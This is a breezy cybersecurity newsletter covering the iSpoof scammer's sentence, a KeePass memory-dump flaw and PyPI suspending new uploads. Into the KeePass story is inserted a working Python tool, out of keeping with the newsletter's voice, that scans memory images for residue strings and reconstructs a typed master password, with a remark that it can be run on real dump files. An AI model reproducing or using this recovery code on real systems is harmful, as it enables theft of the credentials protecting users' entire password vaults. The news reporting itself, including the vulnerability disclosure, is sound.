May 23 2023
Welcome to Gone Phishing, your daily cybersecurity newsletter that’s the Nate Diaz to cybercrime’s Jake Paul 🥊
Today’s hottest cyber security stories:
Notorious UK-based ‘iSpoof’ scammer jailed for 13 years. Ha! Ha!
KeePass password manager exploit exposes master passwords. D’oh!
Python Package Index (PyPI) halts sign-ups & uploads amidst cyberattack
If you haven’t heard of the iSpoof scam, let us break it down for you real quick.
So, this guy and his cronies marketed and sold some software which allowed scammers to convincingly pose as reputable businesses and organisations (mostly banks!) to defraud victims out of cash. How much cash, you ask…
Well, in the UK alone, experts estimate the losses to be as much as £48 million. Not a bad haul, eh?
And internationally? Losses worldwide are said to be at least £100 million. AT LEAST!
So, not a bad run for the scammers but hey ho, all bad things come to an end. And the good news is, Tejay Fletcher, 35, of Western Gateway, London, has finally been sent down for his cybercrimes against humanity. Unlucky mate!
He was handed the sentence on May 18, 2023, having pleaded guilty last month to a number of cyber offences, including facilitating fraud and possessing and transferring criminal property.
This comes some six months after iSpoof was dismantled in November 2022 as part of a coordinated law enforcement operation, resulting in the arrest of Fletcher and 168 other individuals linked to the operation.
Praise be to the cyber gods… and to the UK Metropolitan police! But how did the scam work?
In most cases, iSpoof, which as mentioned was available as a paid service, was used by fraudsters to mask their phone numbers and masquerade as representatives from banks, such as Barclays, Santander, HSBC, Lloyds, Halifax, First Direct, Natwest, Nationwide, and TSB.
The Met said, in a statement: "The website offered a number of packages for users who would buy, in Bitcoin, the number of minutes they wanted to use the software to make calls."
Detective Superintendent Helen Rance added: "By setting up iSpoof, Fletcher created a gateway for thousands of criminals to defraud innocent victims out of millions of pounds."
"Meanwhile he was living a luxury lifestyle benefitting from the profits."
Indeed, Fletcher is believed to have made around £1.7 – £1.9 million in illicit proceeds, in addition to owning a Range Rover, a Lamborghini Urus, and high-end watches from Rolex and Audemars Piguet.
Well, to quote Eminem: Say goodbye, say goodbye to Hollywood 🎶
‘You had one job’ comes to mind, doesn’t it? This isn’t the first time a password manager has either been hacked or, as is the case with KeePass, left itself open to one. We covered a story not so long ago in which LastPass was leaking passwords left, right, and centre.
So, what’s the happs with KeePass? Well, the developer got a fix out a bit sharpish (in test builds of version 2.54; the bug is tracked as CVE-2023-32784) on hearing about the vulnerability via a proof-of-concept (PoC). So it’s another case of the cybersecurity professionals to the rescue! That’s what we like to see.
It’s not the worst cock-up we’ve ever seen, mind. Successful exploitation hinges on the attacker already holding a memory dump from the target machine: a dump of the KeePass process, the swap or hibernation file, or a full RAM image.
And that’s not all; it only works when the master password was typed on the keyboard, not pasted from the clipboard.
So, a fair few hoops for the hacker to jump through, but still, when your one job is protecting passwords, you’ll forgive us if we hold you to a slightly higher standard, no?
Oh well, at least it’s been dealt with and that’s what good actors are there for, I guess.
Here’s what our anonymous action hero had to say on the matter:
"Apart from the first password character, it is mostly able to recover the password in plaintext," security researcher "vdohney," who discovered the flaw and devised a PoC, said.
"No code execution on the target system is required, just a memory dump."
"It doesn't matter where the memory comes from," the researcher added, stating, "it doesn't matter whether or not the workspace is locked.
"It is also possible to dump the password from RAM after KeePass is no longer running, although the chance of that working goes down with the time it's been since then."
KeePass has maintained that the "password database is not intended to be secure against an attacker who has that level of access to the local PC."
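To make the quoted description concrete, here is an added Python example (not KeePass code and not the researcher's PoC) that mimics what was known about the flaw: the masked password box left a leftover string of N mask bullets followed by the Nth typed character in process memory for every keystroke after the first, so scanning a memory image for runs of the bullet character yields each character and its position, with the first character unrecoverable. The "dump" here is constructed inside the script; against a real target the input would be a process dump, pagefile, hibernation file or RAM image. The filler text and padding sizes are assumptions for illustration only.

```python
import re

# KeePass masks each typed password character with this bullet (U+25CF).
# .NET stores strings as UTF-16LE, so one masked character is the byte pair CF 25.
MASK = "\u25cf"

# A run of one or more bullets followed by one printable ASCII char (as a UTF-16LE
# code unit). The run length gives the character's position in the password.
_RESIDUE = re.compile(rb"((?:\xcf\x25)+)([\x20-\x7e]\x00)")


def build_constructed_dump(password: str, stale=()) -> bytes:
    """Return a CONSTRUCTED memory image (not a real KeePass dump).

    Mimics the leftover strings from the buggy text box: for every keystroke
    after the first, a UTF-16LE string of N bullets + the Nth typed character
    survives on the heap. `stale` adds extra (position, char) leftovers, e.g.
    from a character the user typed and then deleted.
    """
    filler = "KeePass Password Safe - Database.kdbx".encode("utf-16-le")  # assumed filler
    chunks = [filler]
    for pos in range(1, len(password)):
        chunks.append((MASK * pos + password[pos]).encode("utf-16-le"))
        chunks.append(b"\x00" * 16)  # assumed heap padding between objects
    for pos, ch in stale:
        chunks.append((MASK * pos + ch).encode("utf-16-le"))
        chunks.append(b"\x00" * 16)
    chunks.append(filler)
    return b"".join(chunks)


def recover_candidates(dump: bytes) -> dict:
    """Scan the image for bullet runs and return {position: set(chars)}."""
    found = {}
    for m in _RESIDUE.finditer(dump):
        pos = len(m.group(1)) // 2  # two bytes per bullet, one bullet per masked char
        found.setdefault(pos, set()).add(m.group(2)[:1].decode("ascii"))
    return found


def reconstruct(dump: bytes) -> str:
    """Best-effort password from residue.

    Position 0 is never recoverable and is shown as '?'; positions with several
    candidates (stale residue) are shown as {ab}; missing positions as '_'.
    Returns '' when the image holds no residue at all.
    """
    cands = recover_candidates(dump)
    if not cands:
        return ""
    out = ["?"]
    for pos in range(1, max(cands) + 1):
        chars = sorted(cands.get(pos, ()))
        if not chars:
            out.append("_")
        elif len(chars) == 1:
            out.append(chars[0])
        else:
            out.append("{" + "".join(chars) + "}")
    return "".join(out)


if __name__ == "__main__":
    image = build_constructed_dump("Password", stale=[(2, "x")])
    print(reconstruct(image))  # ?a{sx}sword
```

The regex works at any byte alignment, so the same scan can be pointed at a raw file read with `open(path, "rb").read()`. Clipboard-pasted passwords never pass through the per-keystroke path, which is why the residue, and this recovery, only apply to typed ones.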
Uh-oh, Python’s Package Index is in trouble.
So much so that the official third-party software repository for the Python programming language has temporarily disabled the ability for users to sign up and upload new packages until further notice.
We need backup!
"The volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion, especially with multiple PyPI administrators on leave," the admins said in a notice published on May 20, 2023.
No additional details about the nature of the malware and the threat actors involved in publishing those rogue packages to PyPI were disclosed.
Yep, sounds about right. Watch this space. Stay safe, y’all!
So long and thanks for reading all the phish!